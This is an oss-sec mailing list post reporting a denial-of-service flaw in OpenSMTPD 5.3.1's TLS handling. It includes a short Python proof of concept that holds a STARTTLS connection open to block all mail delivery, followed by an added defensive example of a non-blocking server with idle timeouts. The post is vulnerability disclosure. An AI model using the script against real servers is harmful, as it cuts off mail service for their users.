oss-sec mailing list archives
CVE Request: DoS in OpenSMTPD TLS Support
From: "Jason A. Donenfeld" <Jason () zx2c4 com>
Date: Sat, 18 May 2013 16:27:22 +0200
Hi Kurt,

The SSL handling in the latest OpenSMTPD (5.3.1) misconfigures its
sockets in blocking mode, allowing an attacker to prevent all mail
delivery simply by holding a socket open.

I discovered this accidentally, as I noticed my HP printer's smtp
client would keep the connection indefinitely open after an
unsuccessful authentication attempt, causing no more mail to be
delivered until I SIGKILL'd my smtpd process or unplugged my printer.

The following reproduces the attack trivially:

#!/usr/bin/env python2
import smtplib
import time
print "[+] Connecting to server and initiating TLS"
smtp = smtplib.SMTP("mail.some-vitim-host.blah", 587)
smtp.starttls()
print "[+] No clients will be able to connect as long as this remains open."
time.sleep(100000000)

Apparently this was fixed recently upstream, noting "evil client" in
the commit message:
http://git.zx2c4.com/OpenSMTPD/commit/?id=38b26921bad5fe24ad747bf9d591330d683728b0

A snapshot has been posted to http://www.opensmtpd.org/archives/ , but
no patch release has yet been made.

Jason
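
Added example, not part of the original post and not OpenSMTPD's code: a minimal single-process server loop that keeps every socket non-blocking and drops peers that stay silent past a deadline, so one idle connection cannot hold up the rest. Plain TCP on loopback stands in for the TLS handshake; `serve`, `demo`, `DEADLINE` and the `250 ok` reply are assumptions made for the illustration.

```python
import contextlib, selectors, socket, threading, time

DEADLINE = 0.3  # assumed limit (seconds) for a peer that has sent nothing

def serve(listener, stop, dropped):
    """One event loop over non-blocking sockets: a silent peer cannot stall it."""
    sel = selectors.DefaultSelector()
    listener.setblocking(False)
    sel.register(listener, selectors.EVENT_READ)
    pending = {}  # conn -> time accepted
    def close(conn):
        sel.unregister(conn)
        conn.close()
        del pending[conn]
    while not stop.is_set():
        for key, _ in sel.select(timeout=0.05):
            if key.fileobj is listener:
                conn, _ = listener.accept()
                conn.setblocking(False)  # never block the loop on one client
                sel.register(conn, selectors.EVENT_READ)
                pending[conn] = time.monotonic()
            else:
                with contextlib.suppress(OSError):  # peer reset: just close it
                    if key.fileobj.recv(1024):
                        key.fileobj.sendall(b"250 ok\r\n")  # stand-in for the handshake
                close(key.fileobj)
        for conn in [c for c, t in pending.items() if time.monotonic() - t > DEADLINE]:
            close(conn)  # silent for too long: reclaim the slot
            dropped.append(conn)

def demo():
    """Constructed loopback run: one silent client, then one normal client."""
    listener = socket.create_server(("127.0.0.1", 0))
    stop, dropped = threading.Event(), []
    worker = threading.Thread(target=serve, args=(listener, stop, dropped))
    worker.start()
    silent = socket.create_connection(listener.getsockname())  # sends nothing
    normal = socket.create_connection(listener.getsockname(), timeout=2)
    normal.sendall(b"EHLO client.example\r\n")
    served = normal.recv(64).startswith(b"250")
    time.sleep(DEADLINE + 0.3)  # let the silent peer's deadline pass
    stop.set()
    worker.join()
    for s in (silent, normal, listener):
        s.close()
    return served, len(dropped)

if __name__ == "__main__":
    print(demo())
```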